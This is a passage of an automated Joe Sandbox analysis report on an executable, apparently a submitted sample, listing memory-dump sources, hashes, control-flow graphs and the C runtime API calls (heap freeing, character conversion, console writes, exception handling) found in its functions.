                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                                                                                  • Opcode ID: 11e29c6da91660b962b68f2e109599ea387523cedfb88df73237309df66a20ad
                                                                                                                                                                                                  • Instruction ID: 228bb4dc1867652a4a3be518af9c52977823282ab434509d5c126c01c2253f9f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 11e29c6da91660b962b68f2e109599ea387523cedfb88df73237309df66a20ad
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5CB12C31A106089FD715CF28C58AF657BE0FF45368F29865CE99ACF2A2C335D991CB42
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 009C1BEA
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2325560087-0
                                                                                                                                                                                                  • Opcode ID: 1d2a4c487f78486ad694c8b215e215a821c9f277873b458d410aafb2259a2253
                                                                                                                                                                                                  • Instruction ID: f1450a4355952f9e17715e712e07737e47bbebf347d530e3d109514e55926768
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d2a4c487f78486ad694c8b215e215a821c9f277873b458d410aafb2259a2253
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33519072EA52059BEB18CF94D881BAEB7F8FB49340F14802AD441EB295D3789A80CF55
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,009C1300), ref: 009C1AB1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                                                  • Opcode ID: 93223fc855632ddbb5199c86a7c998f7a601089c41dc8cb95aab1d5d0079ce48
                                                                                                                                                                                                  • Instruction ID: 921c8fe3b137ccfd6612b8c10c99297dc7d241fadced659e2bcdaf7469c946b4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93223fc855632ddbb5199c86a7c998f7a601089c41dc8cb95aab1d5d0079ce48
                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                                                  • Opcode ID: 1913c910246014684bd660451abc25ef7f2ccc2f40ff10544a5b78ab562b50e6
                                                                                                                                                                                                  • Instruction ID: a5829250fd13cea7855cf808a81e23ce2c0bbe3c1dbe724068cf3ab691512973
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1913c910246014684bd660451abc25ef7f2ccc2f40ff10544a5b78ab562b50e6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53A0243071D101DF4300CF315F4730C37DC55005C0F0540155005C1030D73040C07F01

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 81 9c6507-9c651b 82 9c651d-9c6522 81->82 83 9c6589-9c6591 81->83 82->83 84 9c6524-9c6529 82->84 85 9c65d8-9c65f0 call 9c667a 83->85 86 9c6593-9c6596 83->86 84->83 87 9c652b-9c652e 84->87 95 9c65f3-9c65fa 85->95 86->85 89 9c6598-9c65d5 call 9c4869 * 4 86->89 87->83 90 9c6530-9c6538 87->90 89->85 93 9c653a-9c653d 90->93 94 9c6552-9c655a 90->94 93->94 97 9c653f-9c6551 call 9c4869 call 9c6078 93->97 100 9c655c-9c655f 94->100 101 9c6574-9c6588 call 9c4869 * 2 94->101 98 9c65fc-9c6600 95->98 99 9c6619-9c661d 95->99 97->94 105 9c6616 98->105 106 9c6602-9c6605 98->106 109 9c661f-9c6624 99->109 110 9c6635-9c6641 99->110 100->101 107 9c6561-9c6573 call 9c4869 call 9c6176 100->107 101->83 105->99 106->105 114 9c6607-9c6615 call 9c4869 * 2 106->114 107->101 117 9c6626-9c6629 109->117 118 9c6632 109->118 110->95 112 9c6643-9c6650 call 9c4869 110->112 114->105 117->118 119 9c662b-9c6631 call 9c4869 117->119 118->110 119->118
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 009C654B
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C6095
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C60A7
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C60B9
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C60CB
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C60DD
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C60EF
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C6101
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C6113
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C6125
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C6137
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C6149
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C615B
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C616D
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C6540
                                                                                                                                                                                                    • Part of subcall function 009C4869: HeapFree.KERNEL32(00000000,00000000,?,009C620D,?,00000000,?,00000000,?,009C6234,?,00000007,?,?,009C669F,?), ref: 009C487F
                                                                                                                                                                                                    • Part of subcall function 009C4869: GetLastError.KERNEL32(?,?,009C620D,?,00000000,?,00000000,?,009C6234,?,00000007,?,?,009C669F,?,?), ref: 009C4891
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C6562
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C6577
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C6582
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C65A4
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C65B7
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C65C5
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C65D0
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C6608
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C660F
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C662C
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C6644
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                  • Opcode ID: 89e38b01a793f9dc24dd6644f17d5b7ab912080e9b80965d6a6687587c05bd8a
                                                                                                                                                                                                  • Instruction ID: fe0d3e3c579bb7b5043d93f348fd169dc3b7c318600a3c2221efa963309a3292
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89e38b01a793f9dc24dd6644f17d5b7ab912080e9b80965d6a6687587c05bd8a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55314B71E047449FEB60AA7AE915F9A73ECAF80310F24442EF049DB191DE30ED40CB52

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 138 9c4330-9c4341 139 9c434d-9c43d8 call 9c4869 * 9 call 9c41f6 call 9c4246 138->139 140 9c4343-9c434c call 9c4869 138->140 140->139
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C4344
                                                                                                                                                                                                    • Part of subcall function 009C4869: HeapFree.KERNEL32(00000000,00000000,?,009C620D,?,00000000,?,00000000,?,009C6234,?,00000007,?,?,009C669F,?), ref: 009C487F
                                                                                                                                                                                                    • Part of subcall function 009C4869: GetLastError.KERNEL32(?,?,009C620D,?,00000000,?,00000000,?,009C6234,?,00000007,?,?,009C669F,?,?), ref: 009C4891
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C4350
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C435B
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C4366
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C4371
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C437C
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C4387
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C4392
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C439D
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C43AB
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                  • Opcode ID: 9c469afb2bc09c951f734525f270558b09a31713b0c19cd3d592b1ca9ae6710b
                                                                                                                                                                                                  • Instruction ID: 406a8de5e706e43e48535b953953b9aec9230ce64118ba9f899624e2458ff909
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c469afb2bc09c951f734525f270558b09a31713b0c19cd3d592b1ca9ae6710b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E11B976B00148FFCB41EF96D852ED93BA5EF84750F0140AAB9084F162DA31DE509B82

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 165 9c7ab4-9c7acd 166 9c7acf-9c7adf call 9c82cc 165->166 167 9c7ae3-9c7ae8 165->167 166->167 177 9c7ae1 166->177 169 9c7aea-9c7af2 167->169 170 9c7af5-9c7b19 MultiByteToWideChar 167->170 169->170 171 9c7cac-9c7cbf call 9c123a 170->171 172 9c7b1f-9c7b2b 170->172 174 9c7b2d-9c7b3e 172->174 175 9c7b7f 172->175 178 9c7b5d-9c7b63 174->178 179 9c7b40-9c7b4f call 9cac20 174->179 181 9c7b81-9c7b83 175->181 177->167 183 9c7b64 call 9c62ff 178->183 185 9c7ca1 179->185 191 9c7b55-9c7b5b 179->191 184 9c7b89-9c7b9c MultiByteToWideChar 181->184 181->185 187 9c7b69-9c7b6e 183->187 184->185 188 9c7ba2-9c7bbd call 9c5a15 184->188 189 9c7ca3-9c7caa call 9c646a 185->189 187->185 192 9c7b74 187->192 188->185 197 9c7bc3-9c7bca 188->197 189->171 196 9c7b7a-9c7b7d 191->196 192->196 196->181 198 9c7bcc-9c7bd1 197->198 199 9c7c04-9c7c10 197->199 198->189 200 9c7bd7-9c7bd9 198->200 201 9c7c5c 199->201 202 9c7c12-9c7c23 199->202 200->185 203 9c7bdf-9c7bf9 call 9c5a15 200->203 204 9c7c5e-9c7c60 201->204 205 9c7c3e-9c7c44 202->205 206 9c7c25-9c7c34 call 9cac20 202->206 203->189 218 9c7bff 203->218 208 9c7c9a-9c7ca0 call 9c646a 204->208 209 9c7c62-9c7c7b call 9c5a15 204->209 211 9c7c45 call 9c62ff 205->211 206->208 221 9c7c36-9c7c3c 206->221 208->185 209->208 223 9c7c7d-9c7c84 209->223 212 9c7c4a-9c7c4f 211->212 212->208 217 9c7c51 212->217 222 9c7c57-9c7c5a 217->222 218->185 221->222 222->204 224 9c7c86-9c7c87 223->224 225 9c7cc0-9c7cc6 223->225 226 9c7c88-9c7c98 WideCharToMultiByte 224->226 225->226 226->208 227 9c7cc8-9c7ccf call 9c646a 226->227 227->189
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,009C54C8,00000000,?,?,?,009C7D05,?,?,00000100), ref: 009C7B0E
                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 009C7B46
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,009C7D05,?,?,00000100,5EFC4D8B,?,?), ref: 009C7B94
                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 009C7C2B
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009C7C8E
                                                                                                                                                                                                  • __freea.LIBCMT ref: 009C7C9B
                                                                                                                                                                                                    • Part of subcall function 009C62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,009C7E5B,?,00000000,?,009C686F,?,00000004,00000000,?,?,?,009C3BCD), ref: 009C6331
                                                                                                                                                                                                  • __freea.LIBCMT ref: 009C7CA4
                                                                                                                                                                                                  • __freea.LIBCMT ref: 009C7CC9
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2597970681-0
                                                                                                                                                                                                  • Opcode ID: 7b0b33874d492ca83d7c10610a5137dcd4602ba6bdb0021bc6e11124a315d969
                                                                                                                                                                                                  • Instruction ID: 57534c316125af52f854efd362d9ff29cabad24499ab4271772670dc95f77aab
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b0b33874d492ca83d7c10610a5137dcd4602ba6bdb0021bc6e11124a315d969
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9051D472E54217ABDB259FA4CC41FBBB7AAEB84750F15462CFC04D6240EB34DC40DA52

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 230 9c8417-9c8474 GetConsoleCP 231 9c847a-9c8496 230->231 232 9c85b7-9c85c9 call 9c123a 230->232 234 9c8498-9c84af 231->234 235 9c84b1-9c84c2 call 9c6052 231->235 237 9c84eb-9c84fa call 9c72b7 234->237 242 9c84e8-9c84ea 235->242 243 9c84c4-9c84c7 235->243 237->232 244 9c8500-9c8520 WideCharToMultiByte 237->244 242->237 245 9c84cd-9c84df call 9c72b7 243->245 246 9c858e-9c85ad 243->246 244->232 247 9c8526-9c853c WriteFile 244->247 245->232 252 9c84e5-9c84e6 245->252 246->232 250 9c853e-9c854f 247->250 251 9c85af-9c85b5 GetLastError 247->251 250->232 253 9c8551-9c8555 250->253 251->232 252->244 254 9c8557-9c8575 WriteFile 253->254 255 9c8583-9c8586 253->255 254->251 256 9c8577-9c857b 254->256 255->231 257 9c858c 255->257 256->232 258 9c857d-9c8580 256->258 257->232 258->255
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,009C8B8C,?,00000000,?,00000000,00000000), ref: 009C8459
                                                                                                                                                                                                  • __fassign.LIBCMT ref: 009C84D4
                                                                                                                                                                                                  • __fassign.LIBCMT ref: 009C84EF
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 009C8515
                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,009C8B8C,00000000,?,?,?,?,?,?,?,?,?,009C8B8C,?), ref: 009C8534
                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,009C8B8C,00000000,?,?,?,?,?,?,?,?,?,009C8B8C,?), ref: 009C856D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                  • Opcode ID: d41790aa8cc5b2ba56d882c43f0352d5339904652aec1662bf8828a1437f4cae
                                                                                                                                                                                                  • Instruction ID: 3d25b6614462068eb73152c22ae4af359aebec023eb9d5e7717d819fa7565aef
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d41790aa8cc5b2ba56d882c43f0352d5339904652aec1662bf8828a1437f4cae
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24518D71E00249AFDB10CFA8D885FEEBBB8EF19300F14455AE955E7291DB709A41CB62

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 259 9c1e00-9c1e51 call 9cac80 call 9c1dc0 call 9c2377 266 9c1ead-9c1eb0 259->266 267 9c1e53-9c1e65 259->267 268 9c1ed0-9c1ed9 266->268 269 9c1eb2-9c1ebf call 9c2360 266->269 267->268 270 9c1e67-9c1e7e 267->270 275 9c1ec4-9c1ecd call 9c1dc0 269->275 272 9c1e94 270->272 273 9c1e80-9c1e8e call 9c2300 270->273 274 9c1e97-9c1e9c 272->274 280 9c1ea4-9c1eab 273->280 281 9c1e90 273->281 274->270 278 9c1e9e-9c1ea0 274->278 275->268 278->268 282 9c1ea2 278->282 280->275 284 9c1eda-9c1ee3 281->284 285 9c1e92 281->285 282->275 286 9c1f1d-9c1f2d call 9c2340 284->286 287 9c1ee5-9c1eec 284->287 285->274 293 9c1f2f-9c1f3e call 9c2360 286->293 294 9c1f41-9c1f5d call 9c1dc0 call 9c2320 286->294 287->286 288 9c1eee-9c1efd call 9caac0 287->288 296 9c1eff-9c1f17 288->296 297 9c1f1a 288->297 293->294 296->297 297->286
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 009C1E37
                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 009C1E3F
                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 009C1EC8
                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 009C1EF3
                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 009C1F48
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                                                                                  • Opcode ID: b586fa200c2d054635ded1694428c0e19ccba50d4a31554103859440ccfdd64e
                                                                                                                                                                                                  • Instruction ID: 22f5947b0e45d3922999148c307585137de4c3fcbd57a32a4a7f3c5868c1f40a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b586fa200c2d054635ded1694428c0e19ccba50d4a31554103859440ccfdd64e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB41A134E00248ABCF10DF69C885F9EBBB5BF86354F14805DE8159B392D735DA01CB96

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 305 9c621b-9c6226 306 9c62fc-9c62fe 305->306 307 9c622c-9c62f9 call 9c61df * 5 call 9c4869 * 3 call 9c61df * 5 call 9c4869 * 4 305->307 307->306
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 009C61DF: _free.LIBCMT ref: 009C6208
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C6269
                                                                                                                                                                                                    • Part of subcall function 009C4869: HeapFree.KERNEL32(00000000,00000000,?,009C620D,?,00000000,?,00000000,?,009C6234,?,00000007,?,?,009C669F,?), ref: 009C487F
                                                                                                                                                                                                    • Part of subcall function 009C4869: GetLastError.KERNEL32(?,?,009C620D,?,00000000,?,00000000,?,009C6234,?,00000007,?,?,009C669F,?,?), ref: 009C4891
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C6274
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C627F
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C62D3
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C62DE
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C62E9
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C62F4
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                  • Opcode ID: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                  • Instruction ID: 982516356fe91c43bdafc01fd4ee1a07020b82f1a86cd4fa8d306b63b6e986fb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F115171E44B14AAE521B7B1CC17FCB779C5F80701F44482DB69AAA093DA65BA044752

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
